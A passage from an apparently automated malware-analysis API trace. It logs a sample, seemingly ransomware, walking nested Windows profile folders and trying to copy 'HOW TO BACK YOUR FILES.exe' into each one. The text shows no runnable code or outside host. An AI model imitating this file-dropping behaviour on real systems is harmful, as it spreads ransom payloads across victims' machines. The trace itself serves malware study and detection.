lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0042.666] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.667] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.667] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.667] GetLastError () returned 0x0 [0042.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.667] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.667] CloseHandle (hObject=0x118) returned 1 [0042.667] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.667] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.668] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.668] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer" [0042.668] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.668] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\internet explorer\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.668] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.668] GetLastError () returned 0x0 [0042.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.668] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.669] CloseHandle (hObject=0x118) returned 1 [0042.669] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.669] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ab6e2e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ab6e2e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.669] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.669] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0042.669] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.669] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.670] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.670] GetLastError () returned 0x0 [0042.670] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.670] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.670] CloseHandle (hObject=0x118) returned 1 [0042.670] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.670] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abba5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abba5a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.670] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.670] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0042.670] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.670] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.671] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.671] GetLastError () returned 0x0 [0042.671] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.671] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.671] CloseHandle (hObject=0x118) returned 1 [0042.671] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.671] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.672] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0042.672] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.672] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.672] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.672] GetLastError () returned 0x0 [0042.672] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.672] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.672] CloseHandle (hObject=0x118) returned 1 [0042.673] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.673] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4abe0700, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4abe0700, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.673] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0042.673] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.673] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.673] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.674] GetLastError () returned 0x0 [0042.674] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.674] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.674] CloseHandle (hObject=0x118) returned 1 [0042.674] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.674] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.674] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.674] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0042.674] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.674] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.675] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.675] GetLastError () returned 0x0 [0042.675] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.675] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.675] CloseHandle (hObject=0x118) returned 1 [0042.675] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.675] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac2c9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac2c9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.675] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.676] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0042.676] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.676] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0042.676] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0042.676] GetLastError () returned 0x0 [0042.676] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x2f8fb0 [0042.677] ReadFile (in: hFile=0x118, lpBuffer=0x2f8fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x2f8fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0042.677] CloseHandle (hObject=0x118) returned 1 [0042.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0042.677] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0042.677] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.677] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0042.677] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0042.677] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application 